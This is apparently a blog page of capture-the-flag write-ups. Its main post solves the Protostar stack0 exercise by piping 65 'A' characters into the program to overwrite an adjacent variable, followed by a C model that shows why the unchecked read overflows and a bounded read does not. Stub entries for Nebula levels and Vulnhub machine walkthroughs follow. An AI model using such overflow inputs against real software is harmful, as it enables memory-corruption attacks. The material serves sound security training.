Monday, February 27, 2017

Protostar - stack0

This is my first post on the Protostar series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:


To begin, I run the program to see what's going on:

$ ./stack0

Try again?
$ ./stack0
HI
Try again?
$ 

Okay. Looks like that wasn't what we wanted.

Based off the code, we want to have the program print "you have changed the 'modified' variable". To do this, we need to crash the program.

We have 64 bytes of buffer allocated. If we can send more than 64 bytes, we will change the modified variable from 0 to a non-zero value.

Let's give this a whirl:


$ python -c 'print "A" * 64' | ./stack0
Try again?
$ python -c 'print "A" * 65' | ./stack0
you have changed the 'modified' variable
$ 

Excellent!

Our next attempt will be on stack1.

Thanks for reading!

-geoda
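Why 64 bytes still prints "Try again?" while 65 succeeds in the stack0 run above, as an added example that is not part of the original post or the Protostar source. It assumes `modified` sits directly after the 64-byte buffer and that the program uses an unchecked, gets-style line read (the program's source is not shown on this page); the function names are hypothetical and the input is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 64
#define FRAME_LEN (BUF_LEN + sizeof(int32_t))

/* Copy one input line into a modelled frame and return 'modified'.
 * Assumption: 'modified' sits directly after the 64-byte buffer.
 * limit is the most bytes the reader stores before the NUL. */
int32_t modified_after_read(const char *line, size_t limit)
{
    unsigned char frame[FRAME_LEN] = {0};   /* buffer[64], then modified = 0 */
    int32_t modified;
    size_t i = 0;

    while (line[i] != '\n' && line[i] != '\0' && i < limit) {
        frame[i] = (unsigned char)line[i];
        i++;
    }
    frame[i] = '\0';                        /* terminator replaces the newline */
    memcpy(&modified, frame + BUF_LEN, sizeof modified);
    return modified;
}

/* Constructed input: n 'A' characters plus the newline that print appends. */
int32_t try_len(size_t n, int bounded)
{
    char line[128];
    if (n > sizeof line - 2) n = sizeof line - 2;
    memset(line, 'A', n);
    line[n] = '\n';
    line[n + 1] = '\0';
    /* Unchecked reader: only the model's own size stops it.
     * Bounded reader: BUF_LEN - 1 bytes, as fgets(buffer, 64, stdin) stores. */
    return modified_after_read(line, bounded ? BUF_LEN - 1 : FRAME_LEN - 1);
}

int main(void)
{
    for (size_t n = 64; n <= 65; n++)
        printf("%zu bytes: unchecked modified=%d, bounded modified=%d\n",
               n, (int)try_len(n, 0), (int)try_len(n, 1));
    return 0;
}
```

With 64 characters the only byte that lands past the buffer is the NUL terminator, so `modified` stays 0; the 65th character is the first non-zero byte written into it. The bounded read never reaches `modified` at any input length.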





Sunday, February 26, 2017

Nebula - level03

This is my fourth post on the Nebula series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:



Saturday, February 25, 2017

Nebula - level02

This is my third post on the Nebula series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:


Nebula - level01

This is the second post on the Nebula series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:


Nebula - level00

This is my first post on the Nebula series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:


Lord of the R00t: Walkthrough

Below is my walkthrough for a VM posted on Vulnhub by KookSec called Lord Of The Root back in 2015.



Sunday, February 12, 2017

Pegasus: 1 - Walkthrough


This vulnhub image is called "Pegasus: 1" and it was created by Knapsy.



I found this VM had the perfect balance of remote and local exploitation. There were definitely times during this where I was slamming my head on the desk confused at what I was doing wrong. Other times, I knew exactly what I needed to do, I just didn't know how to actually accomplish the task. This really brought me back to my OSCP days and the infamous "Try Harder". Like anything, if you don't know how to achieve something, spend time researching and learning; it will eventually pay off!